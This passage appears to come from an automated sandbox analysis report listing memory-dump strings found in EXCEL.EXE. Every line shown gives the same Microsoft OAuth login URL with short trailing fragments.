Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeL
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeM
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize_
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizei
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeize9
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeizeB
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeizem
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizej
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizek
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizent
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizete
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizev
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizew
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizex
